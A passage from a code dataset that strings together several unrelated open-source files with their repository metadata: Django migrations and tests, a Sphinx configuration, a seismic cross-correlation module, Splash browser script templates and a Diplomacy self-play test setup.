OR invoice_object_type='makepayments') """, [ct_make_payment.id])
transaction.commit_unless_managed()
if ct_donation:
cursor.execute("""UPDATE invoices_invoice
SET object_type_id=%s
WHERE (invoice_object_type='donation'
OR invoice_object_type='donations') """, [ct_donation.id])
transaction.commit_unless_managed()
if ct_job:
cursor.execute("""UPDATE invoices_invoice
SET object_type_id=%s
WHERE (invoice_object_type='job'
OR invoice_object_type='jobs') """, [ct_job.id])
transaction.commit_unless_managed()
if ct_directory:
cursor.execute("""UPDATE invoices_invoice
SET object_type_id=%s
WHERE (invoice_object_type='directory'
OR invoice_object_type='directories') """, [ct_directory.id])
transaction.commit_unless_managed()
if ct_event_registration:
cursor.execute("""UPDATE invoices_invoice
SET object_type_id=%s
WHERE (invoice_object_type='event_registration'
OR invoice_object_type='calendarevents') """, [ct_event_registration.id])
if ct_corp_memb:
cursor.execute("""UPDATE invoices_invoice
SET object_type_id=%s
WHERE (invoice_object_type='corporate_membership'
OR invoice_object_type='corporatememberships') """, [ct_corp_memb.id])
transaction.commit_unless_managed()
print "Field object_type_id - Populated"
# drop field invoice_object_type
cursor.execute("ALTER TABLE invoices_invoice DROP invoice_object_type")
transaction.commit_unless_managed()
print "Field invoice_object_type - Dropped"
# rename invoice_object_type_id to object_id
cursor.execute("ALTER TABLE invoices_invoice CHANGE invoice_object_type_id object_id int")
transaction.commit_unless_managed()
print "Renamed invoice_object_type to object_id"
print "done" | gpl-3.0 | 5,166,609,565,698,706,000 | 43.564356 | 114 | 0.560667 | false |
QuantumGhost/factory_boy | docs/conf.py | 1 | 8502 | # -*- coding: utf-8 -*-
#
# Factory Boy documentation build configuration file, created by
# sphinx-quickstart on Thu Sep 15 23:51:15 2011.
#
# This file is execfile()d with the current directory set to its containing dir.
#
# Note that not all possible configuration values are present in this
# autogenerated file.
#
# All configuration values have a default; values that are commented out
# serve to show the default.
import sys, os
# If extensions (or modules to document with autodoc) are in another directory,
# add these directories to sys.path here. If the directory is relative to the
# documentation root, use os.path.abspath to make it absolute, like shown here.
#sys.path.insert(0, os.path.abspath('.'))
sys.path.insert(0, os.path.dirname(os.path.abspath('.')))
# -- General configuration -----------------------------------------------------
# If your documentation needs a minimal Sphinx version, state it here.
#needs_sphinx = '1.0'
# Add any Sphinx extension module names here, as strings. They can be extensions
# coming with Sphinx (named 'sphinx.ext.*') or your custom ones.
extensions = [
'sphinx.ext.autodoc',
'sphinx.ext.extlinks',
'sphinx.ext.intersphinx',
'sphinx.ext.viewcode',
]
extlinks = {
'issue': ('https://github.com/FactoryBoy/factory_boy/issues/%s', 'issue #'),
}
# Add any paths that contain templates here, relative to this directory.
templates_path = ['_templates']
# The suffix of source filenames.
source_suffix = '.rst'
# The encoding of source files.
#source_encoding = 'utf-8-sig'
# The master toctree document.
master_doc = 'index'
# General information about the project.
project = u'Factory Boy'
copyright = u'2011-2015, Raphaël Barrois, Mark Sandstrom'
# The version info for the project you're documenting, acts as replacement for
# |version| and |release|, also used in various other places throughout the
# built documents.
#
root = os.path.abspath(os.path.dirname(__file__))
def get_version(*module_dir_components):
import re
version_re = re.compile(r"^__version__ = ['\"](.*)['\"]$")
module_root = os.path.join(root, os.pardir, *module_dir_components)
module_init = os.path.join(module_root, '__init__.py')
with open(module_init, 'r') as f:
for line in f:
match = version_re.match(line[:-1])
if match:
return match.groups()[0]
return '0.1.0'
# The full version, including alpha/beta/rc tags.
release = get_version('factory')
# The short X.Y version.
version = '.'.join(release.split('.')[:2])
# The language for content autogenerated by Sphinx. Refer to documentation
# for a list of supported languages.
#language = None
# There are two options for replacing |today|: either, you set today to some
# non-false value, then it is used:
#today = ''
# Else, today_fmt is used as the format for a strftime call.
#today_fmt = '%B %d, %Y'
# List of patterns, relative to source directory, that match files and
# directories to ignore when looking for source files.
exclude_patterns = ['_build']
# The reST default role (used for this markup: `text`) to use for all documents.
#default_role = None
# If true, '()' will be appended to :func: etc. cross-reference text.
#add_function_parentheses = True
# If true, the current module name will be prepended to all description
# unit titles (such as .. function::).
#add_module_names = True
# If true, sectionauthor and moduleauthor directives will be shown in the
# output. They are ignored by default.
#show_authors = False
# The name of the Pygments (syntax highlighting) style to use.
pygments_style = 'sphinx'
# A list of ignored prefixes for module index sorting.
#modindex_common_prefix = []
# -- Options for HTML output ---------------------------------------------------
# The theme to use for HTML and HTML Help pages. See the documentation for
# a list of builtin themes.
html_theme = 'sphinx_rtd_theme'
# Theme options are theme-specific and customize the look and feel of a theme
# further. For a list of options available for each theme, see the
# documentation.
#html_theme_options = {}
# Add any paths that contain custom themes here, relative to this directory.
#html_theme_path = []
# The name for this set of Sphinx documents. If None, it defaults to
# "<project> v<release> documentation".
#html_title = None
if 'READTHEDOCS_VERSION' in os.environ:
# Use the readthedocs version string in preference to our known version.
html_title = u"{} {} documentation".format(
project, os.environ['READTHEDOCS_VERSION'])
# A shorter title for the navigation bar. Default is the same as html_title.
#html_short_title = None
# The name of an image file (relative to this directory) to place at the top
# of the sidebar.
#html_logo = None
# The name of an image file (within the static path) to use as favicon of the
# docs. This file should be a Windows icon file (.ico) being 16x16 or 32x32
# pixels large.
#html_favicon = None
# Add any paths that contain custom static files (such as style sheets) here,
# relative to this directory. They are copied after the builtin static files,
# so a file named "default.css" will overwrite the builtin "default.css".
html_static_path = ['_static']
# If not '', a 'Last updated on:' timestamp is inserted at every page bottom,
# using the given strftime format.
#html_last_updated_fmt = '%b %d, %Y'
# If true, SmartyPants will be used to convert quotes and dashes to
# typographically correct entities.
#html_use_smartypants = True
# Custom sidebar templates, maps document names to template names.
#html_sidebars = {}
# Additional templates that should be rendered to pages, maps page names to
# template names.
#html_additional_pages = {}
# If false, no module index is generated.
#html_domain_indices = True
# If false, no index is generated.
#html_use_index = True
# If true, the index is split into individual pages for each letter.
#html_split_index = False
# If true, links to the reST sources are added to the pages.
#html_show_sourcelink = True
# If true, "Created using Sphinx" is shown in the HTML footer. Default is True.
#html_show_sphinx = True
# If true, "(C) Copyright ..." is shown in the HTML footer. Default is True.
#html_show_copyright = True
# If true, an OpenSearch description file will be output, and all pages will
# contain a <link> tag referring to it. The value of this option must be the
# base URL from which the finished HTML is served.
#html_use_opensearch = ''
# This is the file name suffix for HTML files (e.g. ".xhtml").
#html_file_suffix = None
# Output file base name for HTML help builder.
htmlhelp_basename = 'FactoryBoydoc'
# -- Options for LaTeX output --------------------------------------------------
# The paper size ('letter' or 'a4').
#latex_paper_size = 'letter'
# The font size ('10pt', '11pt' or '12pt').
#latex_font_size = '10pt'
# Grouping the document tree into LaTeX files. List of tuples
# (source start file, target name, title, author, documentclass [howto/manual]).
latex_documents = [
('index', 'FactoryBoy.tex', u'Factory Boy Documentation',
u'Raphaël Barrois, Mark Sandstrom', 'manual'),
]
# The name of an image file (relative to this directory) to place at the top of
# the title page.
#latex_logo = None
# For "manual" documents, if this is true, then toplevel headings are parts,
# not chapters.
#latex_use_parts = False
# If true, show page references after internal links.
#latex_show_pagerefs = False
# If true, show URL addresses after external links.
#latex_show_urls = False
# Additional stuff for the LaTeX preamble.
#latex_preamble = ''
# Documents to append as an appendix to all manuals.
#latex_appendices = []
# If false, no module index is generated.
#latex_domain_indices = True
# -- Options for manual page output --------------------------------------------
# One entry per manual page. List of tuples
# (source start file, name, description, authors, manual section).
man_pages = [
('index', 'factoryboy', u'Factory Boy Documentation',
[u'Raphaël Barrois, Mark Sandstrom'], 1)
]
# Example configuration for intersphinx: refer to the Python standard library.
intersphinx_mapping = {
'http://docs.python.org/': None,
'django': (
'http://docs.djangoproject.com/en/dev/',
'http://docs.djangoproject.com/en/dev/_objects/',
),
'sqlalchemy': (
'http://docs.sqlalchemy.org/en/rel_0_9/',
'http://docs.sqlalchemy.org/en/rel_0_9/objects.inv',
),
}
| mit | -6,028,333,616,958,771,000 | 32.070039 | 80 | 0.693729 | false |
eqcorrscan/ci.testing | eqcorrscan/utils/correlate.py | 1 | 12024 | """
Correlation functions for multi-channel cross-correlation of seismic data.
:copyright:
EQcorrscan developers.
:license:
GNU Lesser General Public License, Version 3
(https://www.gnu.org/copyleft/lesser.html)
"""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from __future__ import unicode_literals
import numpy as np
import ctypes
from multiprocessing import Pool
from scipy.fftpack.helper import next_fast_len
from eqcorrscan.utils.libnames import _load_cdll
def scipy_normxcorr(templates, stream, pads):
"""
Compute the normalized cross-correlation of multiple templates with data.
:param templates: 2D Array of templates
:type templates: np.ndarray
:param stream: 1D array of continuous data
:type stream: np.ndarray
:param pads: List of ints of pad lengths in the same order as templates
:type pads: list
:return: np.ndarray of cross-correlations
:return: np.ndarray channels used
"""
import bottleneck
from scipy.signal.signaltools import _centered
# Generate a template mask
used_chans = ~np.isnan(templates).any(axis=1)
# Currently have to use float64 as bottleneck runs into issues with other
# types: https://github.com/kwgoodman/bottleneck/issues/164
stream = stream.astype(np.float64)
templates = templates.astype(np.float64)
template_length = templates.shape[1]
stream_length = len(stream)
fftshape = next_fast_len(template_length + stream_length - 1)
# Set up normalizers
stream_mean_array = bottleneck.move_mean(
stream, template_length)[template_length - 1:]
stream_std_array = bottleneck.move_std(
stream, template_length)[template_length - 1:]
# Normalize and flip the templates
norm = ((templates - templates.mean(axis=-1, keepdims=True)) / (
templates.std(axis=-1, keepdims=True) * template_length))
norm_sum = norm.sum(axis=-1, keepdims=True)
stream_fft = np.fft.rfft(stream, fftshape)
template_fft = np.fft.rfft(np.flip(norm, axis=-1), fftshape, axis=-1)
res = np.fft.irfft(template_fft * stream_fft,
fftshape)[:, 0:template_length + stream_length - 1]
res = ((_centered(res, stream_length - template_length + 1)) -
norm_sum * stream_mean_array) / stream_std_array
res[np.isnan(res)] = 0.0
for i in range(len(pads)):
res[i] = np.append(res[i], np.zeros(pads[i]))[pads[i]:]
return res.astype(np.float32), used_chans
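# Minimal usage sketch (illustrative only; the array names below are hypothetical, but the
# shapes follow the docstring above):
#   templates = np.random.randn(2, 200).astype(np.float32)  # 2 templates of 200 samples
#   stream = np.random.randn(86400).astype(np.float32)      # one channel of continuous data
#   ccc, used_chans = scipy_normxcorr(templates, stream, pads=[0, 0])
#   ccc.shape  # -> (2, 86400 - 200 + 1): one normalised correlation trace per template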
def multichannel_xcorr(templates, stream, cores=1, time_domain=False):
"""
Cross-correlate multiple channels either in parallel or not
:type templates: list
:param templates:
A list of templates, where each one should be an obspy.Stream object
containing multiple traces of seismic data and the relevant header
information.
:type stream: obspy.core.stream.Stream
:param stream:
A single Stream object to be correlated with the templates.
:type cores: int
:param cores:
Number of processed to use, if set to None, and dask==False, no
multiprocessing will be done.
:type cores: int
:param cores: Number of cores to loop over
:type time_domain: bool
:param time_domain:
Whether to compute in the time-domain using the compiled openMP
parallel cross-correlation routine.
:returns:
New list of :class:`numpy.ndarray` objects. These will contain
the correlation sums for each template for this day of data.
:rtype: list
:returns:
list of ints as number of channels used for each cross-correlation.
:rtype: list
:returns:
list of list of tuples of station, channel for all cross-correlations.
:rtype: list
.. Note::
Each template must contain the same channels as every other template,
the stream must also contain the same channels (note that if there
are duplicate channels in the template you do not need duplicate
channels in the stream).
"""
no_chans = np.zeros(len(templates))
chans = [[] for _i in range(len(templates))]
# Do some reshaping
stream.sort(['network', 'station', 'location', 'channel'])
t_starts = []
for template in templates:
template.sort(['network', 'station', 'location', 'channel'])
t_starts.append(min([tr.stats.starttime for tr in template]))
seed_ids = [tr.id + '_' + str(i) for i, tr in enumerate(templates[0])]
template_array = {}
stream_array = {}
pad_array = {}
for i, seed_id in enumerate(seed_ids):
t_ar = np.array([template[i].data
for template in templates]).astype(np.float32)
template_array.update({seed_id: t_ar})
stream_array.update(
{seed_id: stream.select(
id=seed_id.split('_')[0])[0].data.astype(np.float32)})
pad_list = [
int(round(template[i].stats.sampling_rate *
(template[i].stats.starttime - t_starts[j])))
for j, template in zip(range(len(templates)), templates)]
pad_array.update({seed_id: pad_list})
if cores is None:
cccsums = np.zeros([len(templates),
len(stream[0]) - len(templates[0][0]) + 1])
for seed_id in seed_ids:
if time_domain:
tr_xcorrs, tr_chans = time_multi_normxcorr(
templates=template_array[seed_id],
stream=stream_array[seed_id], pads=pad_array[seed_id])
else:
tr_xcorrs, tr_chans = fftw_xcorr(
templates=template_array[seed_id],
stream=stream_array[seed_id], pads=pad_array[seed_id])
cccsums = np.sum([cccsums, tr_xcorrs], axis=0)
no_chans += tr_chans.astype(np.int)
for chan, state in zip(chans, tr_chans):
if state:
chan.append((seed_id.split('.')[1],
seed_id.split('.')[-1].split('_')[0]))
else:
pool = Pool(processes=cores)
if time_domain:
results = [pool.apply_async(time_multi_normxcorr, (
template_array[seed_id], stream_array[seed_id],
pad_array[seed_id])) for seed_id in seed_ids]
else:
results = [pool.apply_async(fftw_xcorr, (
template_array[seed_id], stream_array[seed_id],
pad_array[seed_id])) for seed_id in seed_ids]
pool.close()
results = [p.get() for p in results]
xcorrs = [p[0] for p in results]
tr_chans = np.array([p[1] for p in results])
pool.join()
cccsums = np.sum(xcorrs, axis=0)
no_chans = np.sum(tr_chans.astype(np.int), axis=0)
for seed_id, tr_chan in zip(seed_ids, tr_chans):
for chan, state in zip(chans, tr_chan):
if state:
chan.append((seed_id.split('.')[1],
seed_id.split('.')[-1].split('_')[0]))
return cccsums, no_chans, chans
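# Example call (a sketch, not taken from the project docs): `template_streams` is a list of
# obspy Stream objects sharing the channels of the continuous Stream `day_stream`.
#   cccsums, no_chans, chans = multichannel_xcorr(template_streams, day_stream, cores=4)
#   peak_samples = cccsums.argmax(axis=1)  # best-matching sample offset for each template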
def time_multi_normxcorr(templates, stream, pads):
"""
Compute cross-correlations in the time-domain using C routine.
:param templates: 2D Array of templates
:type templates: np.ndarray
:param stream: 1D array of continuous data
:type stream: np.ndarray
:param pads: List of ints of pad lengths in the same order as templates
:type pads: list
:return: np.ndarray of cross-correlations
:return: np.ndarray channels used
"""
from future.utils import native_str
used_chans = ~np.isnan(templates).any(axis=1)
utilslib = _load_cdll('libutils')
utilslib.multi_corr.argtypes = [
np.ctypeslib.ndpointer(dtype=np.float32, ndim=1,
flags=native_str('C_CONTIGUOUS')),
ctypes.c_int, ctypes.c_int,
np.ctypeslib.ndpointer(dtype=np.float32, ndim=1,
flags=native_str('C_CONTIGUOUS')),
ctypes.c_int,
np.ctypeslib.ndpointer(dtype=np.float32, ndim=1,
flags=native_str('C_CONTIGUOUS'))]
utilslib.multi_corr.restype = ctypes.c_int
template_len = templates.shape[1]
n_templates = templates.shape[0]
image_len = stream.shape[0]
ccc = np.ascontiguousarray(
np.empty((image_len - template_len + 1) * n_templates), np.float32)
t_array = np.ascontiguousarray(templates.flatten(), np.float32)
utilslib.multi_corr(t_array, template_len, n_templates,
np.ascontiguousarray(stream, np.float32), image_len,
ccc)
ccc[np.isnan(ccc)] = 0.0
ccc = ccc.reshape((n_templates, image_len - template_len + 1))
for i in range(len(pads)):
ccc[i] = np.append(ccc[i], np.zeros(pads[i]))[pads[i]:]
return ccc, used_chans
def fftw_xcorr(templates, stream, pads):
"""
Normalised cross-correlation using the fftw library.
Internally this function used double precision numbers, which is definitely
required for seismic data. Cross-correlations are computed as the
inverse fft of the dot product of the ffts of the stream and the reversed,
normalised, templates. The cross-correlation is then normalised using the
running mean and standard deviation (not using the N-1 correction) of the
stream and the sums of the normalised templates.
    This Python function wraps the C library written by C. Chamberlain for this
purpose.
:param templates: 2D Array of templates
:type templates: np.ndarray
:param stream: 1D array of continuous data
:type stream: np.ndarray
:param pads: List of ints of pad lengths in the same order as templates
:type pads: list
:return: np.ndarray of cross-correlations
:return: np.ndarray channels used
"""
from future.utils import native_str
utilslib = _load_cdll('libutils')
utilslib.normxcorr_fftw_1d.argtypes = [
np.ctypeslib.ndpointer(dtype=np.float32, ndim=1,
flags=native_str('C_CONTIGUOUS')),
ctypes.c_int,
np.ctypeslib.ndpointer(dtype=np.float32, ndim=1,
flags=native_str('C_CONTIGUOUS')),
ctypes.c_int,
np.ctypeslib.ndpointer(dtype=np.float32, ndim=1,
flags=native_str('C_CONTIGUOUS')),
ctypes.c_int]
utilslib.normxcorr_fftw_1d.restype = ctypes.c_int
# Generate a template mask
used_chans = ~np.isnan(templates).any(axis=1)
template_length = templates.shape[1]
stream_length = len(stream)
n_templates = templates.shape[0]
fftshape = next_fast_len(template_length + stream_length - 1)
    # Normalize the templates
norm = ((templates - templates.mean(axis=-1, keepdims=True)) / (
templates.std(axis=-1, keepdims=True) * template_length))
ccc = np.empty((n_templates, stream_length - template_length + 1),
np.float32)
for i in range(n_templates):
if np.all(np.isnan(norm[i])):
ccc[i] = np.zeros(stream_length - template_length + 1)
else:
ret = utilslib.normxcorr_fftw_1d(
np.ascontiguousarray(norm[i], np.float32), template_length,
np.ascontiguousarray(stream, np.float32), stream_length,
np.ascontiguousarray(ccc[i], np.float32), fftshape)
if ret != 0:
raise MemoryError()
ccc = ccc.reshape((n_templates, stream_length - template_length + 1))
ccc[np.isnan(ccc)] = 0.0
if np.any(np.abs(ccc) > 1.01):
print('Normalisation error in C code')
print(ccc.max())
print(ccc.min())
raise MemoryError()
ccc[ccc > 1.0] = 1.0
ccc[ccc < -1.0] = -1.0
for i in range(len(pads)):
ccc[i] = np.append(ccc[i], np.zeros(pads[i]))[pads[i]:]
return ccc, used_chans
if __name__ == '__main__':
import doctest
doctest.testmod()
| lgpl-3.0 | -4,603,551,828,821,077,000 | 38.683168 | 79 | 0.618596 | false |
jgirardet/unolog | tests/ordonnances/factory.py | 1 | 1288 | import factory
# from ordonnances.models import Conseil, LigneOrdonnance, Medicament, Ordonnance
from ordonnances.models import Conseil, LigneOrdonnance, Medicament, Ordonnance
from tests.factories import FacBaseActe
fk = factory.Faker
class FacOrdonnance(FacBaseActe):
class Meta:
model = 'ordonnances.Ordonnance'
ordre = ""
# ligne = GenericRelation(LigneOrdonnance, related_query_name='medicament')
class FacLigneOrdonnance(factory.DjangoModelFactory):
ordonnance = factory.SubFactory(FacOrdonnance)
ald = fk('boolean')
class Meta:
abstract = True
@classmethod
def _create(cls, model_class, *args, **kwargs):
"""Override the default ``_create`` with our custom call."""
manager = cls._get_manager(model_class)
# The default would use ``manager.create(*args, **kwargs)``
return manager.new_ligne(**kwargs)
class FacMedicament(FacLigneOrdonnance):
class Meta:
model = Medicament
    cip = fk('ean13', locale="fr_FR")
nom = fk('last_name', locale="fr_FR")
posologie = fk('text', max_nb_chars=50, locale="fr_FR")
duree = fk('pyint')
class FacConseil(FacLigneOrdonnance):
class Meta:
model = Conseil
texte = fk('text', max_nb_chars=200, locale="fr_FR")
| gpl-3.0 | 2,254,105,173,301,448,400 | 25.285714 | 81 | 0.677795 | false |
postalXdude/PySplash | py_splash/static.py | 1 | 1346 | LUA_SOURCE = '''
function main(splash)
splash.resource_timeout = splash.args.timeout
{}
local condition = false
while not condition do
splash:wait(splash.args.wait)
condition = splash:evaljs({}{}{})
end
{}
{}
splash:runjs("window.close()")
{}
end
'''
GO = '\tassert(splash:go{}splash.args.url, baseurl=nil, headers={}, http_method="{}", body={}, formdata={}{})' \
.format(*['{}'] * 6)
JS_PIECE = '`{}`, document, null, XPathResult.BOOLEAN_TYPE, null).booleanValue || document.evaluate('
USER_AGENT = '\tsplash:set_user_agent(\'{}\')'
GET_HTML_ONLY = '\tlocal html = splash:html()'
RETURN_HTML_ONLY = '\treturn html'
GET_ALL_DATA = '''
local entries = splash:history()
local last_response = entries[#entries].response
local url = splash:url()
local headers = last_response.headers
local http_status = last_response.status
local cookies = splash:get_cookies()
'''
RETURN_ALL_DATA = '''
return {
url = splash:url(),
headers = last_response.headers,
http_status = last_response.status,
cookies = splash:get_cookies(),
html = splash:html(),
}
'''
PREPARE_COOKIES = '''
splash:init_cookies({}
{}
{})
'''
SET_PROXY = '''
splash:on_request(function(request)
request:set_proxy{}
{}
{}
end)
'''
| mit | 7,171,708,248,713,019,000 | 19.089552 | 112 | 0.595097 | false |
EdwardDesignWeb/grandeurmoscow | main/migrations/0005_auto_20170824_1135.py | 1 | 3162 | # -*- coding: utf-8 -*-
# Generated by Django 1.10.2 on 2017-08-24 11:35
from __future__ import unicode_literals
from django.db import migrations, models
import django.db.models.deletion
import main.models
class Migration(migrations.Migration):
dependencies = [
('main', '0004_auto_20170823_1229'),
]
operations = [
migrations.CreateModel(
name='Categories',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('name', models.CharField(max_length=25, verbose_name='\u041d\u0430\u0438\u043c\u0435\u043d\u043e\u0432\u0430\u043d\u0438\u0435 \u043a\u0430\u0442\u0435\u0433\u043e\u0440\u0438\u0438')),
],
options={
'verbose_name': '\u043a\u0430\u0442\u0435\u0433\u043e\u0440\u0438\u044f',
'verbose_name_plural': '\u0421\u043f\u0438\u0441\u043e\u043a \u043a\u0430\u0442\u0435\u0433\u043e\u0440\u0438\u0439',
},
),
migrations.CreateModel(
name='TypesRooms',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('name', models.CharField(max_length=25, verbose_name='\u041d\u0430\u0438\u043c\u0435\u043d\u043e\u0432\u0430\u043d\u0438\u0435 \u043f\u043e\u043c\u0435\u0449\u0435\u043d\u0438\u044f')),
],
options={
'verbose_name': '\u043f\u043e\u043c\u0435\u0449\u0435\u043d\u0438\u0435',
'verbose_name_plural': '\u0421\u043f\u0438\u0441\u043e\u043a \u043f\u043e\u043c\u0435\u0449\u0435\u043d\u0438\u0439',
},
),
migrations.AlterModelOptions(
name='photo',
options={'verbose_name': '\u0444\u043e\u0442\u043e\u0433\u0440\u0430\u0444\u0438\u044e', 'verbose_name_plural': '\u0424\u043e\u0442\u043e\u0433\u0440\u0430\u0444\u0438\u0438 \u0442\u043e\u0432\u0430\u0440\u0430'},
),
migrations.AlterField(
model_name='photo',
name='image',
field=models.ImageField(upload_to=main.models.get_file_path, verbose_name='\u0424\u043e\u0442\u043e\u0433\u0440\u0430\u0444\u0438\u0438 \u0442\u043e\u0432\u0430\u0440\u0430'),
),
migrations.AddField(
model_name='categories',
name='room',
field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='main.TypesRooms'),
),
migrations.AddField(
model_name='items',
name='category',
field=models.ForeignKey(default=1, on_delete=django.db.models.deletion.CASCADE, to='main.Categories', verbose_name='\u041a\u0430\u0442\u0435\u0433\u043e\u0440\u0438\u044f'),
preserve_default=False,
),
migrations.AddField(
model_name='items',
name='room',
field=models.ForeignKey(default=1, on_delete=django.db.models.deletion.CASCADE, to='main.TypesRooms', verbose_name='\u041f\u043e\u043c\u0435\u0449\u0435\u043d\u0438\u0435'),
preserve_default=False,
),
]
| unlicense | -3,458,896,980,396,601,000 | 47.646154 | 225 | 0.622075 | false |
pculture/mirocommunity | localtv/contrib/contests/tests/unit/test_views.py | 1 | 5490 | import datetime
from localtv.contrib.contests.tests.base import BaseTestCase
from localtv.contrib.contests.models import Contest
from localtv.contrib.contests.views import (ContestDetailView,
ContestListingView)
from localtv.models import Video
class ContestDetailViewUnit(BaseTestCase):
def test_context_data__new(self):
contest = self.create_contest(detail_columns=Contest.NEW)
# MySQL times are only accurate to one second, so make sure the times
# are different by a whole second.
now = datetime.datetime.now()
second = datetime.timedelta(seconds=1)
video1 = self.create_video(name='video1',
when_approved=now - second * 2)
video2 = self.create_video(name='video2',
when_approved=now - second)
video3 = self.create_video(name='video3',
when_approved=now)
self.create_contestvideo(contest, video1)
self.create_contestvideo(contest, video2)
self.create_contestvideo(contest, video3)
view = ContestDetailView()
view.object = contest
context_data = view.get_context_data(object=contest)
self.assertEqual(list(context_data['new_videos']),
[video3, video2, video1])
self.assertTrue('random_videos' not in context_data)
self.assertTrue('top_videos' not in context_data)
def test_context_data__random(self):
contest = self.create_contest(detail_columns=Contest.RANDOM)
video1 = self.create_video(name='video1')
video2 = self.create_video(name='video2')
video3 = self.create_video(name='video3')
self.create_contestvideo(contest, video1)
self.create_contestvideo(contest, video2)
self.create_contestvideo(contest, video3)
view = ContestDetailView()
view.object = contest
context_data = view.get_context_data(object=contest)
self.assertTrue('random_videos' in context_data)
self.assertTrue('new_videos' not in context_data)
self.assertTrue('top_videos' not in context_data)
# Try to test whether the videos are randomly arranged.
random = list(context_data['random_videos'])
contexts = [view.get_context_data(object=contest)
for i in xrange(10)]
self.assertTrue(any([random != list(c['random_videos'])
for c in contexts]))
def test_context_data__top(self):
contest = self.create_contest(detail_columns=Contest.TOP,
allow_downvotes=False)
video1 = self.create_video(name='video1')
video2 = self.create_video(name='video2')
video3 = self.create_video(name='video3')
cv1 = self.create_contestvideo(contest, video1, upvotes=5)
self.create_contestvideo(contest, video2, upvotes=10)
self.create_contestvideo(contest, video3, upvotes=3)
view = ContestDetailView()
view.object = contest
context_data = view.get_context_data(object=contest)
self.assertEqual(list(context_data['top_videos']),
[video2, video1, video3])
self.assertTrue('random_videos' not in context_data)
self.assertTrue('new_videos' not in context_data)
# Downvotes should be ignored if they're disallowed. By adding 6 down
# votes to the video with 5 votes, if the down votes are counted at all
# that video will be in the wrong place.
self.create_votes(cv1, 6, are_up=False)
context_data = view.get_context_data(object=contest)
self.assertEqual(list(context_data['top_videos']),
[video2, video1, video3])
# ... and taken into account otherwise.
contest.allow_downvotes = True
context_data = view.get_context_data(object=contest)
self.assertEqual(list(context_data['top_videos']),
[video2, video3, video1])
class ContestListingViewUnit(BaseTestCase):
def test_get_queryset(self):
contest = self.create_contest()
now = datetime.datetime.now()
second = datetime.timedelta(seconds=1)
video1 = self.create_video(name='video1',
when_approved=now - second * 2)
video2 = self.create_video(name='video2',
when_approved=now - second)
video3 = self.create_video(name='video3',
when_approved=now)
video4 = self.create_video(name='video4',
when_approved=now + second,
status=Video.UNAPPROVED)
self.create_contestvideo(contest, video1)
self.create_contestvideo(contest, video2)
self.create_contestvideo(contest, video3)
self.create_contestvideo(contest, video4)
view = ContestListingView()
view.object = contest
self.assertEqual(list(view.get_queryset()),
[video3, video2, video1])
def test_get(self):
contest = self.create_contest()
view = ContestListingView()
self.assertTrue(view.dispatch(self.factory.get('/'),
pk=contest.pk,
slug=contest.slug))
self.assertEqual(view.object, contest)
| agpl-3.0 | 1,383,522,387,700,707,800 | 42.571429 | 79 | 0.599454 | false |
diplomacy/research | diplomacy_research/models/self_play/algorithms/tests/algorithm_test_setup.py | 1 | 11878 | # ==============================================================================
# Copyright 2019 - Philip Paquette
#
# NOTICE: Permission is hereby granted, free of charge, to any person obtaining
# a copy of this software and associated documentation files (the "Software"),
# to deal in the Software without restriction, including without limitation the
# rights to use, copy, modify, merge, publish, distribute, sublicense, and/or
# sell copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in all
# copies or substantial portions of the Software.
# ==============================================================================
""" Generic class to test an algorithm """
import os
import gym
from tornado import gen
from tornado.ioloop import IOLoop
from diplomacy_research.models.datasets.queue_dataset import QueueDataset
from diplomacy_research.models.draw.v001_draw_relu import DrawModel, load_args as load_draw_args
from diplomacy_research.models.gym import AutoDraw, LimitNumberYears, RandomizePlayers
from diplomacy_research.models.self_play.controller import generate_trajectory
from diplomacy_research.models.self_play.reward_functions import DefaultRewardFunction, DEFAULT_PENALTY
from diplomacy_research.models.state_space import TOKENS_PER_ORDER
from diplomacy_research.models.value.v004_board_state_conv import ValueModel, load_args as load_value_args
from diplomacy_research.players import RuleBasedPlayer, ModelBasedPlayer
from diplomacy_research.players.rulesets import easy_ruleset
from diplomacy_research.proto.diplomacy_proto.game_pb2 import SavedGame as SavedGameProto
from diplomacy_research.utils.proto import read_next_proto, write_proto_to_file
# Constants
HOME_DIR = os.path.expanduser('~')
if HOME_DIR == '~':
raise RuntimeError('Cannot find home directory. Unable to save cache')
class AlgorithmSetup():
""" Tests an algorithm """
def __init__(self, algorithm_ctor, algo_load_args, model_type):
""" Constructor
:param algorithm_ctor: The constructor class for the Algorithm
            :param algo_load_args: The method load_args() for the algorithm
:param model_type: The model type ("order_based", "token_based") of the policy (for caching)
"""
self.saved_game_cache_path = None
self.model_type = model_type
self._algorithm_ctor = algorithm_ctor
self.get_algo_load_args = algo_load_args
self.adapter = None
self.algorithm = None
self.advantage = None
self.reward_fn = DefaultRewardFunction()
self.graph = None
def create_algorithm(self, feedable_dataset, model, hparams):
""" Creates the algorithm object """
self.algorithm = self._algorithm_ctor(feedable_dataset, model, hparams)
@staticmethod
def parse_flags(args):
""" Parse flags without calling tf.app.run() """
define = {'bool': lambda x: bool(x), # pylint: disable=unnecessary-lambda
'int': lambda x: int(x), # pylint: disable=unnecessary-lambda
'str': lambda x: str(x), # pylint: disable=unnecessary-lambda
'float': lambda x: float(x), # pylint: disable=unnecessary-lambda
'---': lambda x: x} # pylint: disable=unnecessary-lambda
# Keeping a dictionary of parse args to overwrite if provided multiple times
flags = {}
for arg in args:
arg_type, arg_name, arg_value, _ = arg
flags[arg_name] = define[arg_type](arg_value)
if arg_type == '---' and arg_name in flags:
del flags[arg_name]
return flags
@staticmethod
def get_policy_model():
""" Returns the PolicyModel """
raise NotImplementedError()
@staticmethod
def get_policy_builder():
""" Returns the Policy's DatasetBuilder """
raise NotImplementedError()
@staticmethod
def get_policy_adapter():
""" Returns the PolicyAdapter """
raise NotImplementedError()
@staticmethod
def get_policy_load_args():
""" Returns the policy args """
return []
@staticmethod
def get_test_load_args():
""" Overrides common hparams to speed up tests. """
return [('int', 'nb_graph_conv', 3, 'Number of Graph Conv Layer'),
('int', 'word_emb_size', 64, 'Word embedding size.'),
('int', 'order_emb_size', 64, 'Order embedding size.'),
('int', 'power_emb_size', 64, 'Power embedding size.'),
('int', 'season_emb_size', 10, 'Season embedding size.'),
('int', 'board_emb_size', 40, 'Embedding size for the board state'),
